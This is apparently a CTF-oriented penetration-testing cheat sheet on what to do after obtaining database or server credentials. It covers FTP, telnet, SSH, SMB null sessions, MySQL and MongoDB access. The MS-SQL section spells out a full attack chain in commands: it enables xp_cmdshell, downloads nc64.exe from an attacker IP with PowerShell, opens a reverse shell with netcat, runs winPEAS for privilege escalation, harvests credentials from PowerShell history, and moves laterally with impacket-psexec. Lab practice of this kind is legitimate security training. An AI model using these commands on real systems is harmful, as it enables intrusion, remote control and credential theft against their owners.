👨‍💻Access Tricks

Got DB/server creds, What's next?


1- Conn to the server:

ftp <IP/Domain>

2-set local FTP file download dir:

lcd /your/pc/dir

3-Download the file:

get <file>

You can also download multiple files with wildcard + mget.

mget *.txt

Anonymous FTP:

When faced with an anon-ftp server just:

  • username: "Anonymous"

  • Password: anything really (sometimes empty).


1-Conn to the telnet server:

telnet <ip> -l <username>

then it will ask for the password.

then you have $ check if you are <username>



1-Conn the SSH server:

ssh <username>@<IP>

then same as the telnet server.


1- Conn to a share:

sudo smbclient //<IP>/<share> -N

2- Find your flag pwd the dir and download the file:

smb: get <file> //while inside smb session
//or you can read it
smb: get <file> -
smbget -R smb://<IP>/<share>/<file>

⚠ Will ask for a pass but by enum you should know if null sesssoin attack is possible so just click enter (no pass).

  • Checking the share permissions:

smbmap -H <IP>



1-Conn to MySQL server:

mysql -h <server_hostname> -u username -p <database_name>
  • -p tells mysql to prompt for a password.

2-List all DB:


3-Select a DB:

USE <DatabaseName>;

4-Show tables

SHOW tables;

5-Select a Table:

SELECT * FROM <TableName>;

💪By Here probably you got what you want...

You can show info about (structure: feild/type/PK..etc)

DESCRIBE <TableName>;


Install mongo client (debian):

apt install mongodb-clients

Connect to MongoDB:

mongo --port <port> -u <username> -p <password> <IP>

SQL Server (MS-SQL)

Great Articles:

1-Connect: if you got the username/password you can conn using Impackt (col. of python tools):

impacket-mssqlclient <USER>:<PASS>@<IP> -p [PORT] -windows-auth

2-Check what role you have in the server:

SELECT is_srvrolemember('sysadmin')

output is 1 then it's true.

3-Activate shell: xp-cmdshell

EXEC sp_configure 'xp_cmdshell', 1;

4-Now you can excute commands:

xp_cmdshell "whoami"

Achieve a Reverse shell: now you can use python SimpleHTTPServer & nc to transfer a payload.

also use powershell to get much more power:

xp_cmdshell "powershell -c pwd"

Download a payload:

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://<Attacker_IP>/nc64.exe -outfile nc64.exe"

I'm downloading nc64.exe

Reverse shell:

nc -lvnp 443  //on my machine
sudo python3 -m http.server 80 //On attacker machine

//on target server:
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe <Attacker_IP> <PORT>"

Now you will notice in your nc that the target got connected to you...🎉

we can use PEASS-ng for win privilage escalation.

in same way download it via python httpserver then excute it:

powershell //inside nc rev now we have wget cuz of PS
wget http://<my_IP>/winPEASx64.exe -outfile winPEASx64.exe

.\winPEASx64.exe //excute it for prev escalation info

you might be able to find: ConsoleHost_history.txt .bash_history equivlant in MS it exsits in: \AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ read it you might find cred info spo you can use:

impacket-psexec <Found_user>@<Target_IP>

Last updated